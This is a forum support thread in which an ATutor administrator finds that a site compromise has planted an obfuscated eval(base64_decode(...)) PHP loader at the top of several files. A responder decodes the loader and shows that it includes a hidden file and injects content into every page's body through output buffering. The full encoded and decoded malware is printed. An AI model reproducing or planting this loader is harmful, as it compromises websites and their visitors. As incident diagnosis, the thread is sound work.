ATutor

Learning Management Tools


  1. Home



Pages:1 2 3 4 5 6 7 8 9 10 11 12 13 14 15


HELP Students cannot register



  • 2009-09-04 12:32:06

    HELP Students cannot register

    I have 1.6.2 installed and I have "Authenticate to Master List" turned OFF.

    When a student tries to register, they are brought to a page that has two input boxes and an "authenticate" button. Please see the attached screenshot. The HTML from viewing the page source is this:

    [php]<form action='/ATutor/registration.php' method='POST'><input type='text' name='login'><br/><input name='pass' type='password'><br /><input type='submit' value='authenticate'></form>[/php]

    This is the first time I have ever seen this and I created a demo account yesterday with no problems.

    Please help as students are trying to register now.

    Thank you


  • 2009-09-04 13:25:44

    Re: HELP! Students cannot register

    I don't know what that is. Its not part of the ATutor source code.

    Here are the originals in the repository if you want to replace them:

    http://atutorsvn.atrc.utoronto.ca/repos/atutor/tags/atutor_1_6_2/registration.php

    http://atutorsvn.atrc.utoronto.ca/repos/atutor/tags/atutor_1_6_2/themes/default/registration.tmpl.php


  • 2009-09-04 14:20:55

    Re: HELP! Students cannot register

    Greg,

    The following was at the top (very first line) of both files you posted to me (on my site, not the repository). I've seen this on some other files as well. Any ideas?

    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9ndGlsZmxtL3B1YmxpY19odG1sL2NhdGFsb2cvZXh0L21vZHVsZXMvcGF5bWVudC9wYXlwYWwvaW1hZ2VzLy5zdm4vdG1wL3Byb3AtYmFzZS9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvZ3RpbGZsbS9wdWJsaWNfaHRtbC9jYXRhbG9nL2V4dC9tb2R1bGVzL3BheW1lbnQvcGF5cGFsL2ltYWdlcy8uc3ZuL3RtcC9wcm9wLWJhc2Uvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>


  • 2009-09-04 14:39:13

    Re: HELP! Students cannot register

    I don't know what's going on. It's unlikely to be anything to do with ATutor. Ask your isp/sysadmin to investigate.


  • 2009-09-04 14:54:01

    Re: HELP! Students cannot register

    Hi,

    It seems that your site has been hacked.

    The code you posted here decodes to the following (indentation added):
    [php]if (function_exists('ob_start') && !isset($GLOBALS['sh_no'])) {
    $GLOBALS['sh_no'] = 1;
    if (file_exists('/home/gtilflm/public_html/catalog/ext/modules/payment/paypal/images/.svn/tmp/prop-base/style.css.php')) {
    include_once('/home/gtilflm/public_html/catalog/ext/modules/payment/paypal/images/.svn/tmp/prop-base/style.css.php');
    if (function_exists('gml') && !function_exists('dgobh')) {
    if (!function_exists('gzdecode')) {
    function gzdecode($R20FD65E9C7406034FADC682F06732868) {
    $R6B6E98CDE8B33087A33E4D3A497BD86B = ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
    $R60169CD1C47B7A7A85AB44F884635E41=10;
    $R0D54236DA20594EC13FC81B209733931=0;
    if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 4) {
    $R0D54236DA20594EC13FC81B209733931 = unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
    $R0D54236DA20594EC13FC81B209733931 = $R0D54236DA20594EC13FC81B209733931[1];
    $R60169CD1C47B7A7A85AB44F884635E41 += 2+$R0D54236DA20594EC13FC81B209733931;
    }
    if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 8) {
    $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
    }
    if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 16) {
    $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
    }
    if ($R6B6E98CDE8B33087A33E4D3A497BD86B & 2) {
    $R60169CD1C47B7A7A85AB44F884635E41 += 2;
    }
    $RC4A5B5E310ED4C323E04D72AFAE39F53 = gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
    if ($RC4A5B5E310ED4C323E04D72AFAE39F53 === FALSE) {
    $RC4A5B5E310ED4C323E04D72AFAE39F53 = $R20FD65E9C7406034FADC682F06732868;
    }
    return $RC4A5B5E310ED4C323E04D72AFAE39F53;
    }
    }
    function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {
    Header('Content-Encoding: none');
    $R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
    if (preg_match('/\<body/si', $R3E33E017CD76B9B7E6C7364FB91E2E90)) {
    return preg_replace('/(\<body[^\>]*\>)/si','$1' . gml(), $R3E33E017CD76B9B7E6C7364FB91E2E90);
    } else {
    return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
    }
    }
    ob_start('dgobh');
    }
    }
    }[/php]

    Quick search for the first line of this code gives some links, e.g. http://www.simplemachines.org/community/index.php?topic=291486.0

    I guess it's where you should contact your hosting service with that info to fix this and close the attack vector(s).